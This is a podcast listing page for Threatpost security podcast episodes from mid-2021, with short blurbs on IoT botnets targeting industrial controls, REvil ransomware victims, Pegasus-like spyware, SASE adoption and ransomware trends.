Podcast: The Threatpost Podcast (LS 34 · TOP 5% what is this?)Episode: IoT Piranhas Are Swarming Industrial ControlsPub date: 2021-07-23Threat actors have been building enormous botnets using IoT devices to try to compromise the computing systems that control crucial infrastructure, such as pipelines (case in point: the DarkSide ransomware attack on Colonial Pipeline) and other utilities, preying on legacy systems that have decades-old vulnerabilities. In this Threatpost podcast, Armis CISO Curtis Simpson delves into how to fight back.The podcast and artwork embedded on this page are from Mike Mimoso, Chris Brook, which is the property of its owner and not affiliated with or endorsed by Listen Notes, Inc.

dark side iot piranhas colonial pipeline listen notes swarming threatpost industrial controls chris brook mike mimoso

IoT Piranhas Are Swarming Industrial Controls

Play Episode Listen Later Jul 23, 2021 23:24

Threat actors have been building enormous botnets using IoT devices to try to compromise the computing systems that control crucial infrastructure, such as pipelines (case in point: the DarkSide ransomware attack on Colonial Pipeline) and other utilities, preying on legacy systems that have decades-old vulnerabilities. In this Threatpost podcast, Armis CISO Curtis Simpson delves into how to fight back.

threats dark side cybersecurity ot industrial iot piranhas colonial pipeline ics pcl swarming threatpost industrial controls

What's Next for REvil's Victims?

Play Episode Listen Later Jul 19, 2021 21:47

21:47 no Nothing good, now that the ransomware gang's servers have vanished mid-negotiation, as ransomware negotiator Kurtis Minder details on Threatpost podcast. Nothing good, now that the ransomware gang's servers have vanished mid-negotiation, as ransomware negotiator Kurtis Minder details on Threatpost podcast. GroupSense's Minder offers tips on

victims minder kurtis minder threatpost

Protecting Phones From Pegasus-Like Spyware Attacks

Play Episode Listen Later Jul 19, 2021 22:11

Podcast: Is protecting your phone from spyware attacks a la NSO Group's Pegasus as simple as getting a new SIM card? Former spyware insider, current mobile white hat hacker Adam Weinberg on how to block three types of spyware attacks.

iphone android protecting mobile ios attacks sim phones pegasus spyware nso group adam weinberg threatpost

Effective Adoption of SASE in 2021

Play Episode Listen Later Jun 2, 2021 21:03

21:03 no forcepoint,sase In this Threatpost podcast, Forcepoint's SASE and Zero Trust director describes how the pandemic jump-started SASE adoption for easier, more affordable security. In this Threatpost podcast, Forcepoint's SASE and Zero Trust director describes how the pandemic jump-started SASE adoption for easier, more affordable

adoption zero trust sase forcepoint threatpost

The State of Ransomware with Fortiguard's Derek Manky